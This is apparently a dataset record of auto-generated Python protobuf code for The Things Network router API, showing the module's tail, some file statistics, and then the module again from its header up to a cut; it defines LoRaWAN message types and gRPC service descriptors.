number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_metadata', full_name='router.DeviceActivationRequest.gateway_metadata', index=5,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activation_metadata', full_name='router.DeviceActivationRequest.activation_metadata', index=6,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trace', full_name='router.DeviceActivationRequest.trace', index=7,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=804,
serialized_end=1250,
)
_DEVICEACTIVATIONRESPONSE = _descriptor.Descriptor(
name='DeviceActivationResponse',
full_name='router.DeviceActivationResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1252,
serialized_end=1278,
)
_GATEWAYSTATUSREQUEST = _descriptor.Descriptor(
name='GatewayStatusRequest',
full_name='router.GatewayStatusRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='gateway_id', full_name='router.GatewayStatusRequest.gateway_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\342\336\037\tGatewayID', file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1280,
serialized_end=1337,
)
_GATEWAYSTATUSRESPONSE = _descriptor.Descriptor(
name='GatewayStatusResponse',
full_name='router.GatewayStatusResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='last_seen', full_name='router.GatewayStatusResponse.last_seen', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='router.GatewayStatusResponse.status', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1339,
serialized_end=1420,
)
_STATUSREQUEST = _descriptor.Descriptor(
name='StatusRequest',
full_name='router.StatusRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1422,
serialized_end=1437,
)
_STATUS = _descriptor.Descriptor(
name='Status',
full_name='router.Status',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='system', full_name='router.Status.system', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='component', full_name='router.Status.component', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_status', full_name='router.Status.gateway_status', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='uplink', full_name='router.Status.uplink', index=3,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='downlink', full_name='router.Status.downlink', index=4,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activations', full_name='router.Status.activations', index=5,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='connected_gateways', full_name='router.Status.connected_gateways', index=6,
number=21, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='connected_brokers', full_name='router.Status.connected_brokers', index=7,
number=22, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1440,
serialized_end=1704,
)
_UPLINKMESSAGE.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_UPLINKMESSAGE.fields_by_name['protocol_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._RXMETADATA
_UPLINKMESSAGE.fields_by_name['gateway_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._RXMETADATA
_UPLINKMESSAGE.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_DOWNLINKMESSAGE.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_DOWNLINKMESSAGE.fields_by_name['protocol_configuration'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._TXCONFIGURATION
_DOWNLINKMESSAGE.fields_by_name['gateway_configuration'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._TXCONFIGURATION
_DOWNLINKMESSAGE.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_DEVICEACTIVATIONREQUEST.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_DEVICEACTIVATIONREQUEST.fields_by_name['protocol_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._RXMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['gateway_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._RXMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['activation_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._ACTIVATIONMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_GATEWAYSTATUSRESPONSE.fields_by_name['status'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._STATUS
_STATUS.fields_by_name['system'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._SYSTEMSTATS
_STATUS.fields_by_name['component'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._COMPONENTSTATS
_STATUS.fields_by_name['gateway_status'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['uplink'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['downlink'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['activations'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
DESCRIPTOR.message_types_by_name['SubscribeRequest'] = _SUBSCRIBEREQUEST
DESCRIPTOR.message_types_by_name['UplinkMessage'] = _UPLINKMESSAGE
DESCRIPTOR.message_types_by_name['DownlinkMessage'] = _DOWNLINKMESSAGE
DESCRIPTOR.message_types_by_name['DeviceActivationRequest'] = _DEVICEACTIVATIONREQUEST
DESCRIPTOR.message_types_by_name['DeviceActivationResponse'] = _DEVICEACTIVATIONRESPONSE
DESCRIPTOR.message_types_by_name['GatewayStatusRequest'] = _GATEWAYSTATUSREQUEST
DESCRIPTOR.message_types_by_name['GatewayStatusResponse'] = _GATEWAYSTATUSRESPONSE
DESCRIPTOR.message_types_by_name['StatusRequest'] = _STATUSREQUEST
DESCRIPTOR.message_types_by_name['Status'] = _STATUS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
SubscribeRequest = _reflection.GeneratedProtocolMessageType('SubscribeRequest', (_message.Message,), {
'DESCRIPTOR' : _SUBSCRIBEREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.SubscribeRequest)
})
_sym_db.RegisterMessage(SubscribeRequest)
UplinkMessage = _reflection.GeneratedProtocolMessageType('UplinkMessage', (_message.Message,), {
'DESCRIPTOR' : _UPLINKMESSAGE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.UplinkMessage)
})
_sym_db.RegisterMessage(UplinkMessage)
DownlinkMessage = _reflection.GeneratedProtocolMessageType('DownlinkMessage', (_message.Message,), {
'DESCRIPTOR' : _DOWNLINKMESSAGE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.DownlinkMessage)
})
_sym_db.RegisterMessage(DownlinkMessage)
DeviceActivationRequest = _reflection.GeneratedProtocolMessageType('DeviceActivationRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEACTIVATIONREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.DeviceActivationRequest)
})
_sym_db.RegisterMessage(DeviceActivationRequest)
DeviceActivationResponse = _reflection.GeneratedProtocolMessageType('DeviceActivationResponse', (_message.Message,), {
'DESCRIPTOR' : _DEVICEACTIVATIONRESPONSE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.DeviceActivationResponse)
})
_sym_db.RegisterMessage(DeviceActivationResponse)
GatewayStatusRequest = _reflection.GeneratedProtocolMessageType('GatewayStatusRequest', (_message.Message,), {
'DESCRIPTOR' : _GATEWAYSTATUSREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.GatewayStatusRequest)
})
_sym_db.RegisterMessage(GatewayStatusRequest)
GatewayStatusResponse = _reflection.GeneratedProtocolMessageType('GatewayStatusResponse', (_message.Message,), {
'DESCRIPTOR' : _GATEWAYSTATUSRESPONSE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.GatewayStatusResponse)
})
_sym_db.RegisterMessage(GatewayStatusResponse)
StatusRequest = _reflection.GeneratedProtocolMessageType('StatusRequest', (_message.Message,), {
'DESCRIPTOR' : _STATUSREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.StatusRequest)
})
_sym_db.RegisterMessage(StatusRequest)
Status = _reflection.GeneratedProtocolMessageType('Status', (_message.Message,), {
'DESCRIPTOR' : _STATUS,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.Status)
})
_sym_db.RegisterMessage(Status)
DESCRIPTOR._options = None
_UPLINKMESSAGE.fields_by_name['protocol_metadata']._options = None
_UPLINKMESSAGE.fields_by_name['gateway_metadata']._options = None
_DOWNLINKMESSAGE.fields_by_name['protocol_configuration']._options = None
_DOWNLINKMESSAGE.fields_by_name['gateway_configuration']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['dev_eui']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['app_eui']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['protocol_metadata']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['gateway_metadata']._options = None
_GATEWAYSTATUSREQUEST.fields_by_name['gateway_id']._options = None
_GATEWAYSTATUSRESPONSE.fields_by_name['status']._options = None
_ROUTER = _descriptor.ServiceDescriptor(
name='Router',
full_name='router.Router',
file=DESCRIPTOR,
index=0,
serialized_options=None,
serialized_start=1707,
serialized_end=1979,
methods=[
_descriptor.MethodDescriptor(
name='GatewayStatus',
full_name='router.Router.GatewayStatus',
index=0,
containing_service=None,
input_type=github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._STATUS,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='Uplink',
full_name='router.Router.Uplink',
index=1,
containing_service=None,
input_type=_UPLINKMESSAGE,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='Subscribe',
full_name='router.Router.Subscribe',
index=2,
containing_service=None,
input_type=_SUBSCRIBEREQUEST,
output_type=_DOWNLINKMESSAGE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='Activate',
full_name='router.Router.Activate',
index=3,
containing_service=None,
input_type=_DEVICEACTIVATIONREQUEST,
output_type=_DEVICEACTIVATIONRESPONSE,
serialized_options=None,
),
])
_sym_db.RegisterServiceDescriptor(_ROUTER)
DESCRIPTOR.services_by_name['Router'] = _ROUTER
_ROUTERMANAGER = _descriptor.ServiceDescriptor(
name='RouterManager',
full_name='router.RouterManager',
file=DESCRIPTOR,
index=1,
serialized_options=None,
serialized_start=1982,
serialized_end=2127,
methods=[
_descriptor.MethodDescriptor(
name='GatewayStatus',
full_name='router.RouterManager.GatewayStatus',
index=0,
containing_service=None,
input_type=_GATEWAYSTATUSREQUEST,
output_type=_GATEWAYSTATUSRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetStatus',
full_name='router.RouterManager.GetStatus',
index=1,
containing_service=None,
input_type=_STATUSREQUEST,
output_type=_STATUS,
serialized_options=None,
),
])
_sym_db.RegisterServiceDescriptor(_ROUTERMANAGER)
DESCRIPTOR.services_by_name['RouterManager'] = _ROUTERMANAGER
# @@protoc_insertion_point(module_scope)
| 45.917574 | 3,507 | 0.781981 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: github.com/TheThingsNetwork/api/router/router.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from github_com.TheThingsNetwork.api import api_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2
from github_com.TheThingsNetwork.api.protocol import protocol_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2
from github_com.TheThingsNetwork.api.gateway import gateway_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2
from github_com.TheThingsNetwork.api.trace import trace_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='github.com/TheThingsNetwork/api/router/router.proto',
package='router',
syntax='proto3',
serialized_options=b'\n\037org.thethingsnetwork.api.routerB\013RouterProtoP\001Z&github.com/TheThingsNetwork/api/router\252\002\033TheThingsNetwork.API.Router',
serialized_pb=b'\n3github.com/TheThingsNetwork/api/router/router.proto\x12\x06router\x1a\x1bgoogle/protobuf/empty.proto\x1a-github.com/gogo/protobuf/gogoproto/gogo.proto\x1a)github.com/TheThingsNetwork/api/api.proto\x1a\x37github.com/TheThingsNetwork/api/protocol/protocol.proto\x1a\x35github.com/TheThingsNetwork/api/gateway/gateway.proto\x1a\x31github.com/TheThingsNetwork/api/trace/trace.proto\"\x12\n\x10SubscribeRequest\"\xcd\x01\n\rUplinkMessage\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12\x35\n\x11protocol_metadata\x18\x0b \x01(\x0b\x32\x14.protocol.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x33\n\x10gateway_metadata\x18\x0c \x01(\x0b\x32\x13.gateway.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x1b\n\x05trace\x18\x15 \x01(\x0b\x32\x0c.trace.Trace\"\xe3\x01\n\x0f\x44ownlinkMessage\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12?\n\x16protocol_configuration\x18\x0b \x01(\x0b\x32\x19.protocol.TxConfigurationB\x04\xc8\xde\x1f\x00\x12=\n\x15gateway_configuration\x18\x0c \x01(\x0b\x32\x18.gateway.TxConfigurationB\x04\xc8\xde\x1f\x00\x12\x1b\n\x05trace\x18\x15 \x01(\x0b\x32\x0c.trace.Trace\"\xbe\x03\n\x17\x44\x65viceActivationRequest\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12T\n\x07\x64\x65v_eui\x18\x0b \x01(\x0c\x42\x43\xe2\xde\x1f\x06\x44\x65vEUI\xc8\xde\x1f\x00\xda\xde\x1f\x31github.com/TheThingsNetwork/ttn/core/types.DevEUI\x12T\n\x07\x61pp_eui\x18\x0c \x01(\x0c\x42\x43\xe2\xde\x1f\x06\x41ppEUI\xc8\xde\x1f\x00\xda\xde\x1f\x31github.com/TheThingsNetwork/ttn/core/types.AppEUI\x12\x35\n\x11protocol_metadata\x18\x15 \x01(\x0b\x32\x14.protocol.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x33\n\x10gateway_metadata\x18\x16 \x01(\x0b\x32\x13.gateway.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x39\n\x13\x61\x63tivation_metadata\x18\x17 \x01(\x0b\x32\x1c.protocol.ActivationMetadata\x12\x1b\n\x05trace\x18\x1f \x01(\x0b\x32\x0c.trace.Trace\"\x1a\n\x18\x44\x65viceActivationResponse\"9\n\x14GatewayStatusRequest\x12!\n\ngateway_id\x18\x01 \x01(\tB\r\xe2\xde\x1f\tGatewayID\"Q\n\x15GatewayStatusResponse\x12\x11\n\tlast_seen\x18\x01 \x01(\x03\x12%\n\x06status\x18\x02 \x01(\x0b\x32\x0f.gateway.StatusB\x04\xc8\xde\x1f\x00\"\x0f\n\rStatusRequest\"\x88\x02\n\x06Status\x12 \n\x06system\x18\x01 \x01(\x0b\x32\x10.api.SystemStats\x12&\n\tcomponent\x18\x02 \x01(\x0b\x32\x13.api.ComponentStats\x12\"\n\x0egateway_status\x18\x0b \x01(\x0b\x32\n.api.Rates\x12\x1a\n\x06uplink\x18\x0c \x01(\x0b\x32\n.api.Rates\x12\x1c\n\x08\x64ownlink\x18\r \x01(\x0b\x32\n.api.Rates\x12\x1f\n\x0b\x61\x63tivations\x18\x0e \x01(\x0b\x32\n.api.Rates\x12\x1a\n\x12\x63onnected_gateways\x18\x15 \x01(\r\x12\x19\n\x11\x63onnected_brokers\x18\x16 \x01(\r2\x90\x02\n\x06Router\x12:\n\rGatewayStatus\x12\x0f.gateway.Status\x1a\x16.google.protobuf.Empty(\x01\x12\x39\n\x06Uplink\x12\x15.router.UplinkMessage\x1a\x16.google.protobuf.Empty(\x01\x12@\n\tSubscribe\x12\x18.router.SubscribeRequest\x1a\x17.router.DownlinkMessage0\x01\x12M\n\x08\x41\x63tivate\x12\x1f.router.DeviceActivationRequest\x1a .router.DeviceActivationResponse2\x91\x01\n\rRouterManager\x12L\n\rGatewayStatus\x12\x1c.router.GatewayStatusRequest\x1a\x1d.router.GatewayStatusResponse\x12\x32\n\tGetStatus\x12\x15.router.StatusRequest\x1a\x0e.router.StatusBv\n\x1forg.thethingsnetwork.api.routerB\x0bRouterProtoP\x01Z&github.com/TheThingsNetwork/api/router\xaa\x02\x1bTheThingsNetwork.API.Routerb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2.DESCRIPTOR,])
_SUBSCRIBEREQUEST = _descriptor.Descriptor(
name='SubscribeRequest',
full_name='router.SubscribeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=345,
serialized_end=363,
)
_UPLINKMESSAGE = _descriptor.Descriptor(
name='UplinkMessage',
full_name='router.UplinkMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='payload', full_name='router.UplinkMessage.payload', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='router.UplinkMessage.message', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='protocol_metadata', full_name='router.UplinkMessage.protocol_metadata', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_metadata', full_name='router.UplinkMessage.gateway_metadata', index=3,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trace', full_name='router.UplinkMessage.trace', index=4,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=366,
serialized_end=571,
)
_DOWNLINKMESSAGE = _descriptor.Descriptor(
name='DownlinkMessage',
full_name='router.DownlinkMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='payload', full_name='router.DownlinkMessage.payload', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='router.DownlinkMessage.message', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='protocol_configuration', full_name='router.DownlinkMessage.protocol_configuration', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_configuration', full_name='router.DownlinkMessage.gateway_configuration', index=3,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trace', full_name='router.DownlinkMessage.trace', index=4,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=574,
serialized_end=801,
)
_DEVICEACTIVATIONREQUEST = _descriptor.Descriptor(
name='DeviceActivationRequest',
full_name='router.DeviceActivationRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='payload', full_name='router.DeviceActivationRequest.payload', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='router.DeviceActivationRequest.message', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dev_eui', full_name='router.DeviceActivationRequest.dev_eui', index=2,
number=11, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\342\336\037\006DevEUI\310\336\037\000\332\336\0371github.com/TheThingsNetwork/ttn/core/types.DevEUI', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='app_eui', full_name='router.DeviceActivationRequest.app_eui', index=3,
number=12, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\342\336\037\006AppEUI\310\336\037\000\332\336\0371github.com/TheThingsNetwork/ttn/core/types.AppEUI', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='protocol_metadata', full_name='router.DeviceActivationRequest.protocol_metadata', index=4,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_metadata', full_name='router.DeviceActivationRequest.gateway_metadata', index=5,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activation_metadata', full_name='router.DeviceActivationRequest.activation_metadata', index=6,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trace', full_name='router.DeviceActivationRequest.trace', index=7,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=804,
serialized_end=1250,
)
_DEVICEACTIVATIONRESPONSE = _descriptor.Descriptor(
name='DeviceActivationResponse',
full_name='router.DeviceActivationResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1252,
serialized_end=1278,
)
_GATEWAYSTATUSREQUEST = _descriptor.Descriptor(
name='GatewayStatusRequest',
full_name='router.GatewayStatusRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='gateway_id', full_name='router.GatewayStatusRequest.gateway_id', index=0,
number=1, type=9, cpp_type=9, label=1,
